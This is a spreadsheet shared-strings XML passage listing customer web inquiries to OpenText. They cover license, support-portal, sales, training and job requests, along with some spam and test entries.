  <si>
    <t>Hi, _x000D_
Could you send me a link to make a download of Encase Forensic 8.08._x000D_
I have many licenses of Encase and need to update them here onEY Brazil._x000D_
_x000D_
Best Regards,_x000D_
Felipe S. Lazzaro</t>
  </si>
  <si>
    <t>Hello- I am writing on behalf of Virtua Health. We were hoping to get in contact with someone regarding the Alchemy product for an introductory/informational session. We are located in Southern New Jersey (Camden County). Thank you!</t>
  </si>
  <si>
    <t>Trying to set my password for the support portal.  I click on the link sent to me "OpenText Connect - Registration Confirmation" but it won't let me set a password.  May have locked it out at this point.  Cyd</t>
  </si>
  <si>
    <t>I need a quote for a single license and 5 years of support_x000D_
237 exceed single user_x000D_
End user is Northrop Grumman</t>
  </si>
  <si>
    <t>Two questions: I have a client on Metastorm BPM platform who wants to get on Maintenance and Support which used to be under Thomson Reuters but since they moved to Aderant, they are not covered.  Who can they talk with about getting on Support.  Second Question, what is the process for becoming a direct partner of OpenText.  We have been under Thomson Reuters but in some cases, there are clients who want us to be their primary contact and we need support occassionally from OpenText._x000D_
Thanks,_x000D_
Garvin Fouts</t>
  </si>
  <si>
    <t>please email me to discss an rfp for a global AP solutions</t>
  </si>
  <si>
    <t>Good morning, we are interested in knowing more details about the documentary control software that you offer, we propose a meeting either face-to-face or telephone / video call for Tuesday, March 13th, either at 09:00 or 15:00 hours in Peruvian time._x000D_
_x000D_
We remain attentive to your kind response.</t>
  </si>
  <si>
    <t>I am a student and wondering if your company offers student licenses for your Encase Mobile Investigator software or any kind of trial services. I am requesting to use this software for a BSc level project. Thank you for your time and i hope to hear from you positively on this issue.</t>
  </si>
  <si>
    <t>Please can you tell me if any licenses have been purchased for Open Text Exceed 14 or Open Text Exceed 3D by anyone at Pell Frischmann.</t>
  </si>
  <si>
    <t xml:space="preserve">We're a company that was sold off from The Hartford, into a new company Talcott Resolution. I'm looking for a e-fax solution. The Hartford currently uses opentext, so i'm looking for pricing and information to stand up a fax solution for my company. </t>
  </si>
  <si>
    <t>Can not login to Content portal._x000D_
Trying to reach Documentum materials., _x000D_
Account Name. Defense POW/MIA Accounting Agency (DPAA), end user code: EU0313301, EU0321536</t>
  </si>
  <si>
    <t>HI ,_x000D_
_x000D_
I submitted a message yesterday but I have not had a response yet._x000D_
_x000D_
I work for Hexcel and we currently run StreamServe 5.6.2 and I would like to discuss how we would go about upgrading._x000D_
_x000D_
Kind regards_x000D_
_x000D_
Henry Joy</t>
  </si>
  <si>
    <t>I am a former employee of GXS and I am reaching out to you for issuance of my skill set letter. Kindly acknowledge.</t>
  </si>
  <si>
    <t>I'm trying to register for OT Support for Dialogue.  I have accounts now for ken.toy@prinova.com and ken.toy@messagepoint.com.  I'm looking for My Support access.  Prinova/Messagepoint's main contact is Eric Scholey, and our End User Number is “EU0308970”.  Can you take a look and see why the My Support registration is failing?_x000D_
_x000D_
Thanks,_x000D_
Ken</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
I would like to see a trial "How your OCR system works, How would it be compatible with SAP to integrate"_x000D_
Will there be any demo session available ?_x000D_
_x000D_
Best regards_x000D_
Hemant</t>
  </si>
  <si>
    <t>Our Encase Basic SMS expired on 1st March 2019 however we purchased Endpoint Investigator as a replacement. Since our Encase Basic expired I and two colleagues no longer seem to have access to MySupport and cannot download software or documentation. My colleague Derek Simpson does appear to have access to MySupport which appears to have been granted with our new order for Endpoint Investigator. Can you reinstate my access please.</t>
  </si>
  <si>
    <t>Need technical support. OpenText errors system Errors cannot find specified file</t>
  </si>
  <si>
    <t xml:space="preserve">we have a shareable FMP license that is phantom locked by my co-worker, Gary Coltson._x000D_
</t>
  </si>
  <si>
    <t>From our office, QA tried sending outbound faxes to Rightfax Server and found every fax is ending with "Phone Line Problem" today (03/07/2019). Can this issue be resolved urgently as QA has to run couple tests and Rightfax should work good.</t>
  </si>
  <si>
    <t>I am looking for information regarding the integration of published Ariba contracts into OpenText Contract Centre.</t>
  </si>
  <si>
    <t xml:space="preserve">We have been looking at your website for Security patches or updates to the opentext exceed software that we use but we have been unable to locate anything. I did find information about support and it appears that a support service agreement would need to be purchased in order to receive security patches and updates. Is that correct, or is there a way to manually download patches and updates? </t>
  </si>
  <si>
    <t>I'm Lucy. I'm Chinese. I hope to immigrate to Canada. I have IELTS 6 points, bachelor's degree in e-commerce, and I have been engaged in IT software testing for more than 10 years. Can you help me match my employer and let me immigrate to Canada smoothly?</t>
  </si>
  <si>
    <t xml:space="preserve">Coalesce Research Group invites all the participants across the globe to attend the ‘International Conference on Big Data Analytics and Data Science’ scheduled on Nov 11-12, 2019 in Las Vegas, Nevada, USA._x000D_
_x000D_
Data Science 2019 offers an excellent opportunity to meet and make new contacts in the field of Big Data, by providing collaboration spaces and break-out rooms with tea and lunch for delegates between sessions with invaluable networking time for you. It allows delegates to have issues addressed on Big Data and Data Science by recognized global experts who are up to date with the latest developments and provide information on new techniques and technologies. This International conference will feature world-renowned speakers, keynote speakers, plenary speeches, young research forum, poster presentations, technical workshops, and career guidance sessions._x000D_
_x000D_
Big Data Analytics and Data Science conference cover all aspects of Big Data, Data Science and Data mining including algorithms, software and systems, and applications._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>LU</t>
  </si>
  <si>
    <t>Hi,_x000D_
Is there an option to enable the 'keep alive' session in Exceed?_x000D_
Our firewall are set to kill inactive sessions after 2 hours._x000D_
Regards,_x000D_
Bruno</t>
  </si>
  <si>
    <t>We need to renew or setup a new service agreement</t>
  </si>
  <si>
    <t>Hello, I'm working as SAP support for Asahi customer and we planned OTEX VIM upgrade from 7.0 to 7.5 on landscape with Accenture company. I'm not able to get to package password (sap note 2068615), but I believe that license or contract should be already payed by customer. Is is possible to check it as soon as possible and provide me package password or access to your support page?_x000D_
_x000D_
Best Regards,_x000D_
Martin Zachensky</t>
  </si>
  <si>
    <t>I have an outdated document management system and want to explore alternatives that accommodate both scanned documents and electronic content</t>
  </si>
  <si>
    <t xml:space="preserve">We have recently upgraded Documentum 16.4 version and we have some user poping up with this issue [DFC_SESSION_HANDLE_DYNAMIC_FA_x000D_
Failed to obtain session for dynamic handle_x000D_
</t>
  </si>
  <si>
    <t>Gibt es im Juni auch ein Seminar Archive Center V16.2 in Grasbrunn?</t>
  </si>
  <si>
    <t>Training details</t>
  </si>
  <si>
    <t>Re: Error in your Website_x000D_
_x000D_
Hello_x000D_
_x000D_
_x000D_
My name is Tracy Jackson  and I am a Digital Marketing Specialists for a Creative Agency._x000D_
_x000D_
I noticed a few technical errors which correspond to a drop in website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
_x000D_
After closer inspection, it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_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Name, company’s website address (mandatory) and /or phone number._x000D_
_x000D_
Regards,_x000D_
Tracy Jackson_x000D_
tracywebseomarketing@gmail.com</t>
  </si>
  <si>
    <t>NP</t>
  </si>
  <si>
    <t>Hello. And Bye.</t>
  </si>
  <si>
    <t>We updraged Documentum 16.4 and we have issue [DFC_SESSION_HANDLE_DYNAMIC_FA_x000D_
Failed to obtain session for dynamic handle_x000D_
 and_x000D_
Client can't install Webtop Content Transfer._x000D_
He installs it but can't get to the second install of Webtop Native Setup.</t>
  </si>
  <si>
    <t xml:space="preserve">We use IRM Client for PDF and we are facing issues with it. It is affecting our work and we need assistance on this. </t>
  </si>
  <si>
    <t>1000000 money help me</t>
  </si>
  <si>
    <t>We are interested in Documentum. Could you please contact us and give some information about this software? We are looking forward to hearing from your company._x000D_
Best regards</t>
  </si>
  <si>
    <t xml:space="preserve">good day Sir/Mam_x000D_
im inquiring on your product of  EnCase Investigator_x000D_
Digital forensics and security software on how much is the product and can i ask for the quotation of the software and hardware specially if your offering the forensic Laptop or any similar hardware my company is interested on buying on your company  </t>
  </si>
  <si>
    <t xml:space="preserve">Ich benötige dringend meine Steuerkarte für die Steuererklärung 2010._x000D_
Meine Personalnummer lautet 6330_x000D_
Mit freundinchen Grüßen _x000D_
Peter Lischke </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a sub-contracting option for support/development within Captiva space in India. Location within India is not a constraint. </t>
  </si>
  <si>
    <t>We have a new application to use, my user has applied to me for the app, I have approved it and it shows up, and his app also shows activation. But when he logged in the interface, he still showed no authorized workers.</t>
  </si>
  <si>
    <t>We are setting up OpenText SOCKS Client for communicating with an external server over port 22. When we telnet into the server via Windows command line, it works successfully. However, the application that we are using is based on Cygwin and it uses ssh to connect. This connectivity is not working even though OpenText SOCKS Client is running on the host PC running Cygwin._x000D_
_x000D_
Can you provide any additional support on this scenario? _x000D_
_x000D_
Thanks for your support._x000D_
_x000D_
Melwin George Philip_x000D_
+974--55724520</t>
  </si>
  <si>
    <t>We run a Actuate report system, which version is 9.0. So we need its support from your side. _x000D_
Would you please help to advice me how to get the support?_x000D_
Thank you!</t>
  </si>
  <si>
    <t>How can we get the support for old version of Actuate report system?</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I am working with DevOps team . Planning to implement Documentum deployment tool in the current process. Please help me how to deploy the packages with Documentum tool._x000D_
_x000D_
Thanks,_x000D_
Veerendra</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I was looking for the job postings on the WaterlooWorks and I saw your “Software Developer” post for the Waterloo office. Unfortunately, I’m not in the co-op program so I wanted to try my chance and ask if you are also accepting interns for the same position. I was going to apply from the career section in your website but I couldn’t find the same job opening there nor an email address for the waterloo office so I decided to contact from here instead._x000D_
_x000D_
I have completed classes in various areas of Computer Science such as Object-Oriented Software Development, Numerical Computation, Algorithms and Foundations of Sequential Programs._x000D_
_x000D_
I am currently studying my 3A term at the University of Waterloo until April 2019. After taking classes and focusing on Track&amp;Field for the past two summers I wanted to take this opportunity to get an internship this summer and gain working experience in my field._x000D_
_x000D_
I focused mainly on my classes and Track&amp;Field until September 2018. Therefore I don’t have prior working experience. However, on my spare time I've developed a passion for Web Application Development after taking online classes on Udacity and W3schools. I believe I would be a good fit for the Software Developer Intern role based on my technical background and knowledge. _x000D_
_x000D_
I am available from May 2019 to August 2019 for a four-month internship. Please contact with me so I can send my resume and further information._x000D_
_x000D_
Kind Regards,_x000D_
Berdem Yildiz</t>
  </si>
  <si>
    <t>Hi there. Tried to register for My Support but I don't have any info regarding our support contract (which was probably handled through the US office) and the lesser registration I was allowed doesn't give me access to the Knowledge base. Anyway, I have the TrustedLink for i client (runtime file is 6.04.01c), which was formerly running on a Windows7 machine, and am trying to get it to run on a Windows10 laptop. When I try to access the Visual Mapper it throws an error, saying the "PC does not meet technical requirements for IBM i Access for Windows". The ReadMe file referenced lists a very specific software environment, so I'm wondering if there's a newer version of the client for Windows10? Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">My account cannot access support service such as Knowledge Base, Open a Support Ticket. Could please help to grant these service to me so that I can support our customer. Below is my colleague account "Kenneth Ma" for your reference. </t>
  </si>
  <si>
    <t>Just need the cash buy clothes</t>
  </si>
  <si>
    <t>Hi we have an old order 110264807. Are these licenses expired? Can we renew?</t>
  </si>
  <si>
    <t>I have problems with the recordings, please help me._x000D_
_x000D_
1. The calls from a user are not recording._x000D_
2. Calls from an Alcatel softphone are recorded with noise._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>I am with State of Minnesota IT at the department of transportation (MNIT@DOT). We bought edocs thru a reseller ADV/Element. We are just doing some investigation on what you sell for managed services contract for the edocs/metastrom product. adv/element has done config/customization on the edocs side.</t>
  </si>
  <si>
    <t>I need to pay our renewal on Contract Number G-SC2015165,  Ref # RC393266._x000D_
_x000D_
I would like to pay by credit card and I don't see a way to pay online.</t>
  </si>
  <si>
    <t>I am making contact to learn about your company. Please send me an email.</t>
  </si>
  <si>
    <t>We have an OpenText Gateway 2100. Looking for instructions on how to look and see if there are any frame slips on gateway</t>
  </si>
  <si>
    <t>FivePoint is interested in implementing an enterprise wide document management solution.  I would like to speak with someone at Open Text about your solution offering._x000D_
Thanks</t>
  </si>
  <si>
    <t>We currently have RightFax running on a virtual machine in our VM environment. The VMware is being decommissioned. We would like to migrate the RightFax to a new machine in our HyperV environment. Plus reconfigure the RF for our new phone system. Can OpenText help with this migration and reconfiguration?</t>
  </si>
  <si>
    <t>One of our Right Fax Servers has stopped working. Some of the services are not starting as expected. Can we please have some support on this as this is affecting our business?</t>
  </si>
  <si>
    <t>dfuller@opentext.com</t>
  </si>
  <si>
    <t>IMMEDIATELY STOP ALL EMAILS TO MY ABOVE LISTED EMAIL ADDRESS!!! I did not sign up for whatever this service is. STOP!</t>
  </si>
  <si>
    <t>I will like to know if Open Text runs on Redhat Enterprise Linux 7.0</t>
  </si>
  <si>
    <t>Our services are set to run up on March 30th. Does this mean that we will no longer be able to update/work on current or new cases as of March 31st?</t>
  </si>
  <si>
    <t>Need assistance moving 3 numbers from eFax</t>
  </si>
  <si>
    <t>we are looking for an eFax solution that is appropriate for our medical/dental clinics and wanted to better understand your RightFax solution and the cost of it.</t>
  </si>
  <si>
    <t xml:space="preserve">Where can I find the online list of EnCe examiners? My old link for guidance software doesn't work. Also I want to add the EnCe badge to my Linkedin profile do I need to fill out a form and where do I get the high res image._x000D_
_x000D_
Thanks Steve Baker EnCe 15-0916-7265 </t>
  </si>
  <si>
    <t>Technical information on upgrade path for eDOCs 5.3.1 including software dependencies with Office products and Acrobat.</t>
  </si>
  <si>
    <t>I have a few quotes I am trying to get for my service team through NIWC (previously SPAWAR).  May I get a contact I may speak about these opportunities.  these are quick turn around._x000D_
_x000D_
Thanks, Katie</t>
  </si>
  <si>
    <t xml:space="preserve">Good day Team,_x000D_
_x000D_
_x000D_
   I’m currently working on a 2 day business meet titled “Plant Reliability &amp; Maintenance Excellence Summit” which is being held on 4th – 5th September 2019 | Monterrey, Mexico and would like to see if Opentext would be interested in presenting your brand, products &amp; services to over 70+ senior industry professionals representing leading energy companies, oil &amp; gas, automobile, industrial attending this event from the LatAm region._x000D_
_x000D_
Do let me know who I can take this up with._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Mukesh Kumar_x000D_
Business Development - Head 	_x000D_
</t>
  </si>
  <si>
    <t>TEST 123</t>
  </si>
  <si>
    <t>Interested in learning more about eDocs and content management solutions for law firm of 10 attorneys and 7 staff.</t>
  </si>
  <si>
    <t>I would like to know when my EnCE expires and what I can do to renew it?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Steve Sanabria</t>
  </si>
  <si>
    <t>We currently use LegalKey and need to move all compenents to new servers, including SQL, who do I need to speak with?</t>
  </si>
  <si>
    <t>I am looking for a pricing/quoting/underwriting solution for ancillary group and individual dental, life, and disability products.</t>
  </si>
  <si>
    <t>I inherited an old copy and dongle of Encase Portable and I am wondering if we could renew it or would it just make sense to look at repurchasing it? I am not sure how old the software and dongle are. I can provide information on the HASP dongles or the Encase dongle. Let me know.</t>
  </si>
  <si>
    <t>I use brava desktop does it work on iPad.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a quote on Brava Enterprise. </t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I am researching possible software solutions for a project that requires me to redact documents, in the region of several hundred._x000D_
_x000D_
I would be interested din learning more about your product._x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t xml:space="preserve">Testing - 3 - Learning Services </t>
  </si>
  <si>
    <t xml:space="preserve">TESTING - Learning Services </t>
  </si>
  <si>
    <t>1) I am unable to submit a support ticket via the normal process. It says I do not have access and when I try to send an email and then confirm I still do not have access._x000D_
_x000D_
2) We are looking to create a new litigation hold in Encase that takes evidence collections from previous litigation holds. This is done to retire/remove old data from old litigation holds that is not needed but to still conserve the data needed. Is there a way to do this without while still preserving the chain custody and history of collection for that data?</t>
  </si>
  <si>
    <t>I need to speak with the manager handling the NGA account. Please email me back at kenneth.t.bloxton@nga.mil with a point of contact</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to acquire a ZTE smart phone. I get an error message the icuin58.dll is missing. When I click on OK the acquisition stops and fails. How do I over come this error? </t>
  </si>
  <si>
    <t>Je voudrais être mis en contact pour un projet de démat factures</t>
  </si>
  <si>
    <t>I open an account under the email address sydney.pershaw@canada.ca and registered 4 employees for the Open 1-0184 course in Ottawa, Canada starting on March 11, 2019. Can you please send me all four invoices directly as soon as possible so I can pay them and confirm the registration with the employees?_x000D_
Thank you. _x000D_
Sydney Pershaw</t>
  </si>
  <si>
    <t>This is Yen Yang from PA government (Office of Administration).  we are looking for a CRM/Case management solution for our program offices. Hope you would be able to provide your products and solutions for us with a demo. please feel free to contact me at 717-772-6664 or qyang@pa.gov. thanks</t>
  </si>
  <si>
    <t>Proposing to use an existing Documentum instance to support a large volume back record digitization and subsequent classification. Looking to understand:_x000D_
Latest functionality supporting classification_x000D_
Details of roadmap associated with system upgrade  _x000D_
Sizing and license considerations</t>
  </si>
  <si>
    <t>I need a quote for Encase Endpoint Investigator w/maintenance qty 2000, Guidance prime protect qty 1 and encase mobile investigator for encase endpoint investigator qty 1. This is for one of my customers in the federal government in Canada. Please get back to me ASAP as they need pricing by end of day today.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to see a demo of OpenText in relation to Document Management. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext, _x000D_
_x000D_
One of our customers, Robert Waggoner (Navy Cyber Defense Operations Command (NCDOC) has reached out to August Schell to help them with an effort to get all of their Software licenses from different vendors to expire at the same time. _x000D_
_x000D_
I know from my conversations with the customer that there are nine security keys that they own and we want to add this to our quote to get them on the same page for the renewal. _x000D_
_x000D_
Feel free to reach out at your earliest convenience and I can go over the details._x000D_
_x000D_
V/r,_x000D_
Brian Nemeroff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>So I took a Encase course from the USSS at NCFI in 2017.  If I was interested in taking DF210 - Building an Investigation with EnCase, would I still need to take DF120 - Foundations in Digital Forensics with EnCase?</t>
  </si>
  <si>
    <t>I tried to register and create an account, but on clicking register i reached a page that said I don't have permission</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Sejal Gupta. I am a high school student in Long Island and I am seeking an internship this summer. I’m interested in interning at OpenText._x000D_
_x000D_
Skills_x000D_
Java_x000D_
Python_x000D_
Matlab_x000D_
Arduino_x000D_
_x000D_
Experience_x000D_
Research at Stony Brook in Machine Learning and Mechanical Engineering (June 2018 - Present)_x000D_
Intern for iStart Valley Startup Accelerator (June 2018 - December 2018)_x000D_
Founder of the Innovation and Entrepreneurship Club at GGKLI (Sept. 2015 - Present)_x000D_
Head of Business for the Robotics team: Have created a 50-page business plan over the past three years._x000D_
 _x000D_
I am interested in the intersection of artificial intelligence, innovation and entrepreneurship. I am excited by the idea of using AI to digitalize data collection, like OpenText does. I would love to learn more about the structure behind the scenes._x000D_
 _x000D_
Accordingly, I'd love to spend the summer interning at OpenText in any capacity. I'm excited about operations, product market/fit, prototyping, programming and immersing myself in startup culture._x000D_
 _x000D_
Could we please schedule a call next week?_x000D_
_x000D_
If not could you please introduce me to others who would be interested._x000D_
 _x000D_
Regards, _x000D_
Sejal</t>
  </si>
  <si>
    <t>My name is Kiran and I am with Wells Fargo division of Application Products Center of Excellence. I am the Patch Research Analyst for your product "Report &amp; Output Management Suite" within our company, Wells Fargo Bank NA._x000D_
_x000D_
As Patch Analyst, I am responsible for researching and Identifying product vendor patches for product information for a subset of 3rd party vendor products within our Application Competency Center._x000D_
_x000D_
Request your assistance to the following product, specifically the latest versions with the build number, release dates and release notes please._x000D_
_x000D_
_x000D_
Report &amp; Output Management Suite6  6.1-- ?_x000D_
Report &amp; Output Management Suite6  6.0 --?_x000D_
Report &amp; Output Management Suite5  5.6 --?</t>
  </si>
  <si>
    <t>Hi, I need to know whether you have an authorized training center in Egypt or the Middle East? if yes, appreciate sharing their contact information, please.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I hope you’ll be able to help me with my enquiry. _x000D_
In my organization we use SharePoint to handle case and document management. _x000D_
In our technical setup a case is a site containing to document libraries, one for Office documents and one for Mails. _x000D_
To comply with GDPR we are not able to retain member information indefinitely. We would therefore like to be able to mask names and social security numbers in documents (Word, Excel, PowerPoint and PDF). Is this something that your product ‘InfoArchive’ can handle? On your site (opentext/products-and-solutions/products/enterprise-content-management/archiving) your have written the following, which is why I’m hopeful: Encrypt and mask data selectively to secure privacy and satisfy regulations._x000D_
_x000D_
Best_x000D_
Thomas</t>
  </si>
  <si>
    <t>I am not abel to get access to MySupport. I tried couple of times to confirm registration. Confirmation was successfull but i did not get access to My Support.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are currently considering opportunities to resell your product to our client, a company with headcount 1000+, interested in ready-made Records Management solution._x000D_
Could you please provide us with some basic information on costs for OpenText Records Management software?</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am looking for partners in Morocco for the purchase of some licenses</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I work for Hexcel and we currently run StreamServe 5.6.2. which we know is going end of life this year._x000D_
_x000D_
We would like to upgrade to  ExStream. Initially I am just interested in the upgrade path and the options we have._x000D_
_x000D_
If you could have someone contact me to discuss the options it would be very appreciated._x000D_
_x000D_
Kind regards_x000D_
_x000D_
Henry Joy</t>
  </si>
  <si>
    <t>Merci</t>
  </si>
  <si>
    <t>Getting PDF invoices from the Florida lottery where I won a nice stack of money but it's the first time I work with e invoice. So it would be so nice if you could help me that my invoices go through to software and that I get paid on my bank account or Paypal?</t>
  </si>
  <si>
    <t xml:space="preserve">Good day, _x000D_
Can you please confirm if Open Text EFM can integrate with SAP Solution manager ie that Solution manager will be able to received logs and monitor that system if a diagnostic agent is installed ? </t>
  </si>
  <si>
    <t>Au cours de ce début d’année, nous avons lancé une étude visant à évaluer la pertinence d’un outil groupe de dématérialisation des factures fournisseurs. _x000D_
Dans ce cadre, nous souhaitons vous rencontrer, courant mars, idéalement à notre siège Lavallois, afin d’aborder avec vous les thèmes suivants :_x000D_
_x000D_
- Présentation générale de la société OPENTEXT et de votre offre._x000D_
- Démonstration de vos solutions de dématérialisation des factures fournisseurs (incl. SAP VIM &amp; l’intégration avec SAP FI/MM)._x000D_
- Focus sur les solutions &amp; contrats OPENTEXT en cours avec les entités du groupe Lactalis à travers le monde. Détails des modalités de pricing. _x000D_
_x000D_
Nous vous proposons les dates suivantes :_x000D_
15/03 : après-midi uniquement_x000D_
19/03 : horaire à votre convenance_x000D_
21/03 : horaire à votre convenance_x000D_
_x000D_
Pouvez-vous revenir vers mois rapidement afin de verrouiller les planning ?_x000D_
_x000D_
Cdt,_x000D_
Mr PARIS</t>
  </si>
  <si>
    <t>We are looking at OpenText training locally, do you work with any AP provider in selling your training below :_x000D_
1. 4-4202 OpenText MBPM 9.x Foundation_x000D_
2. 5-4210 OpenText MBPM 9.x Certification</t>
  </si>
  <si>
    <t>After confirming my login account, I could not able to open the support link. I want to access captiva knowledgebase.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
Is "OpenText Exceed" subject to U.S. Export Administration Regulations (EAR) (Part 730-774)?  If yes, can you please provide the Export Classification Control Number (ECCN)?_x000D_
_x000D_
Thank you!_x000D_
_x000D_
Rachel Booth_x000D_
2095596902_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Can I ask if your Encase Mobile product has the ability to log / capture messages sent by on SMS, WhatsApp, WeChat and other messaging apps?_x000D_
_x000D_
We are a current Encase customer for Windows clients, but I'd be interested to know more about what the mobile client does._x000D_
_x000D_
Thank you, Steve </t>
  </si>
  <si>
    <t>How to download? We need to study the CMS for implement on client site.</t>
  </si>
  <si>
    <t>we are currently organizing, “8th World Congress on_x000D_
Immunology” scheduled duringMarch 11-12, 2019_x000D_
atLondon, UK_x000D_
with a theme of “Scrutinizing Recent Advancements in the Field of Immunology”. It is honour and privilege to invite you for the conference to participate for the Conference. _x000D_
_x000D_
Regards,_x000D_
John.h  | _x000D_
Immunology world 2019 _x000D_
| PULSUS Group_x000D_
40 Bloomsbury Way, Lower Ground Floor_x000D_
London, United Kingdom, WC1A 2SE_x000D_
Contact: +1800-982-0387_x000D_
immunologyworld@pulsusglobalevents.com</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am unable to create technical support ticket, I am getting message "We're sorry, your account does not grant you access to this resource."_x000D_
My details are as follows:_x000D_
Company Name - Dabur India Limited_x000D_
SAP S-User ID - S0005069518_x000D_
SPA Customer Number - 348846_x000D_
_x000D_
Regards,_x000D_
Arvind Singh_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are looking for VIM support for our organisation via open text. Please let me know whom can be contacted for same.</t>
  </si>
  <si>
    <t>We are using your FAX2MAIL Service and we are trying to extending the usage to generating fax to Macau.  We have try to add country code 853 in the email but the result is in error.  The final address found from portal is "011852853{fax number}".  May I have your help to check _x000D_
1) Can we send fax to Macau?_x000D_
2) If yes, what should we use in the email recipient ?_x000D_
3) Moreover, is there any extra cost if we send fax to other countries?_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Would you please let me know how to login support website?_x000D_
I have already registered a user account, but when I try to login, I always get following error: Web Server Error._x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
My company do business with BMW (German) and require to me to reply in Opentext Survey form. And one of require in survey, will let me use OFTP2 for transferring data.  But I didn't use it before._x000D_
Would you please help to advise me ,what's the Company software (OFTP2), can complie with Opentext system._x000D_
Sorry for your inconvenience and thank you in advance for help._x000D_
Best regards,</t>
  </si>
  <si>
    <t>We are an Australian distributor who has just signed a distribution agreement with Myer. Part of the agreement is that we need to process their orders via EDI which we would want to integrate with our existing systems (currently we have no system for receiving or processing EDI orders)._x000D_
_x000D_
Our orders are managed in MYOB EXO first before being sent onwards to our distribution centre for picking and packing (our Distribution Centre program is called Navigator managed by RFBS Solutions), ideally we are looking for a software solution which would allow us to receive the EDI orders and then push them to EXO for processing and send the order information such as ASN back to Myer. We also utilise IFS (Smart freight) for shipping orders from our DC to our freight carrier, which is where we believe we would need to print the SSCC labels and ASN information. _x000D_
_x000D_
What would be the cost of setting up this integration along with any ongoing costs for this system? _x000D_
_x000D_
We are looking to have a system live and operational by the end of this month so how long roughly would an integration take to get up and running?</t>
  </si>
  <si>
    <t>I noticed your posting on LinkedIn for a Senior Customer Event Program Manager, and was very interested in the position.  Unfortunately, the link to apply from LinkedIn is not working, and I cannot find the posting on the careers page of your website.  I would love to submit my resume for consideration if you are able to provide me with the email address of someone on the hiring committee.  Thank you in advance.</t>
  </si>
  <si>
    <t>I would like to knowhow to run biquery under win 7 32 bit or win 10 64 it.  I know we have an older version but maybe I need an updated version of biquery</t>
  </si>
  <si>
    <t>Hello. Is your software able to read vertical print? For example, there is often text written vertically on a death certificate form.  Thank you.</t>
  </si>
  <si>
    <t>We are a FAX2mail customer.  How do we send secure faxs?</t>
  </si>
  <si>
    <t>Hello, please advise how to close the account.  This email follows the voice message left with accounts receivable. Account#771682</t>
  </si>
  <si>
    <t>Looking for pricing information for budgetary purpose._x000D_
_x000D_
1) On-prem with two server as primary/backup or active/active_x000D_
- fax via email integration (exchange)_x000D_
- Cisco Call Manager 11.5 integration_x000D_
- Xerox MFD integration_x000D_
2) Cloud?_x000D_
- what is required?</t>
  </si>
  <si>
    <t>i would need to have access to view and process the orders_x000D_
Thank You</t>
  </si>
  <si>
    <t>For RightFax over IP using SIP Trunking, can RightFax be configured to use another UDP port other than the standard SIP port of 5060?</t>
  </si>
  <si>
    <t>I would like to register an employee for 1-7610 training starting March 11, 2019.</t>
  </si>
  <si>
    <t>A transaction was done on Feb. 16 for $76.20 on my Managing Director's (Audra Hession) corporate card and I do not have a receipt for this amount. If someone would email me the receipt it would be greatly appreciated. Thank you.</t>
  </si>
  <si>
    <t>I am reaching out from the co-op office @ the University of Windsor.  I am eager to connect with a member of your Campus Recruitment Team to discuss co-op &amp; internship opportunities for our bright &amp; talented students.  I am excited to hear back from you!</t>
  </si>
  <si>
    <t>Hello guys, right now we are upgrading Encase forensic from version 7 to 8. I notice i can't download the product, even when we got a licence till 2022. Any idea how can i download the product?. Kind regards.</t>
  </si>
  <si>
    <t>I have been attempting to get a hold / hear back from someone for months, and have had no responses to my multiple tickets.  I am unable to open tickets from the "My Support" section, as it keeps redirecting me to a "No Access" page, saying I have not yet confirmed email access.  I have done this many times, but nothing changes._x000D_
_x000D_
Can someone please contact me A.S.A.P., as I need to start the process to get an updated license key for a new PC that replaced my old one._x000D_
_x000D_
Thomas Inkster</t>
  </si>
  <si>
    <t>I'd like to get information about Documentum for our medical device company please. _x000D_
_x000D_
Thanks, _x000D_
Sothary</t>
  </si>
  <si>
    <t>please change the contact name on our acct# 863107 from Eric Anderson to Laurie Dempsey.  Eric is no longer with AWC.  thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I'm trying to reset my password, but it says it was sent to my email and I haven't received anything. Can you please assist?_x000D_
_x000D_
Thank you. _x000D_
</t>
  </si>
  <si>
    <t>Buen día_x000D_
_x000D_
Solicitud de apoyo con canales en México para renovar el soporte de RightFax o en su defecto me proporciona una carta especificando que el Canal autorizado es E-Paper_x000D_
_x000D_
Gracias_x000D_
Saludos_x000D_
_x000D_
_x000D_
Hi!!_x000D_
_x000D_
Request for support with partner's in Mexico to renew the support of RightFax or failing to provide me with a letter specifying that the authorized partner is E-Paper_x000D_
_x000D_
Thank you_x000D_
regards</t>
  </si>
  <si>
    <t>TJ</t>
  </si>
  <si>
    <t>I'd like to set up an account for fax to email! Thank you</t>
  </si>
  <si>
    <t>Hi EnCase team. I am a registered EnCase user. Please send me the links to download EnCase Forensic Imager and the latest release of EnCase. Thank you.</t>
  </si>
  <si>
